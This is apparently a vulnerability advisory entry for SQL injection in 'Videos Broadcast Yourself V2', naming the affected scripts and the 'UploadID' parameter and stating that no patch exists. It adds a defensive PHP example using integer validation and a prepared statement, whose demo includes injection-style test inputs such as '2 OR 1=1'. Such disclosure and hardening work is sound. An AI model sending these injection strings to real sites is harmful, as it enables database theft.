Vendor: Videos Broadcast Yourself V2
By: Mr.SQL
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Videos Broadcast Yourself V2
Affected Version From: Videos Broadcast Yourself V2
Affected Version To: Videos Broadcast Yourself V2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Remote SQL Injection Vulnerability ( videoint.php UploadID )
Videos Broadcast Yourself V2 contains a vulnerability that allows an attacker to inject arbitrary SQL commands via the 'UploadID' parameter in 'videoint.php'. It can be exploited to disclose sensitive information from the database, such as usernames, passwords, and email addresses. The 'catvideo.php' and 'cviewchannels.php' scripts are also vulnerable to SQL injection.
Mitigation:
Input validation should be used to prevent SQL injection attacks.
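One way to apply this mitigation to the 'UploadID' parameter, shown as an added example that is not the product's own code: the value is validated as a positive integer and then bound as a typed parameter instead of being concatenated into the query. The `uploads` table, its columns, the function names and the in-memory SQLite database are assumptions made so the example runs stand-alone.

```php
<?php
// Hypothetical schema and constructed rows; the application's real tables are not shown on the page.
function demoDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE uploads (id INTEGER PRIMARY KEY, title TEXT)');
    $db->exec("INSERT INTO uploads (id, title) VALUES (1, 'intro clip'), (2, 'demo reel')");
    return $db;
}

// Accept only a positive integer; anything else is rejected rather than "cleaned".
function parseUploadId($raw): ?int
{
    if (!is_string($raw)) {          // arrays such as UploadID[]=2 end up here
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// The value is bound as a typed parameter and never becomes part of the SQL text.
function fetchUpload(PDO $db, $rawUploadId): ?array
{
    $id = parseUploadId($rawUploadId);
    if ($id === null) {
        return null;                 // caller should answer 400 and log the request
    }
    $stmt = $db->prepare('SELECT id, title FROM uploads WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: one valid id, then malformed values that must be rejected.
$db = demoDb();
foreach (['2', '2 OR 1=1', "2'", '', ['2']] as $raw) {
    $row = fetchUpload($db, $raw);
    printf("%-12s => %s\n", json_encode($raw), $row ? $row['title'] : 'rejected');
}
```

The page does not give the parameter names used by 'catvideo.php' and 'cviewchannels.php', so the same pattern would have to be applied to each request parameter those scripts pass to the database.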